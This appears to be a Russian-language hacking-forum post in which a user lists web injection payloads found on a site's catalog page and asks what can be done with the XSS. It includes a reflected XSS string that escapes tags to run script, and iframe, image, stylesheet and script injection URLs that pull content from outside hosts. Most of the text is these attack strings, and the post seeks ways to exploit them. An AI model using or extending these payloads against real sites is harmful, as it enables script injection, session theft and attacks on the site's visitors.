Spoiler: Get запрос catalog/?firm=%27"--></style></scRipt><scRipt>alert(0x0001B6)</scRipt> В общем такой вопрос что можно сделать с этой Xss ?
Так же есть уязвимость frame injection Url http://site.ru/catalog/?collection=<iframe src="http://r87.com/?"></iframe> Parameter Type GET
Там еще image injection Code: http://site.ru/catalog/?collection=<img src="http://mysite/xxx.jpg" /> style injection Code: http://site.ru/catalog/?collection=<link rel="stylesheet" href="http://mysite/xxx.css" /> И script injection Code: http://site.ru/catalog/?collection=<script src="http://mysite/xxx.js"></script> Короче, ты полностью сломал этот сайт.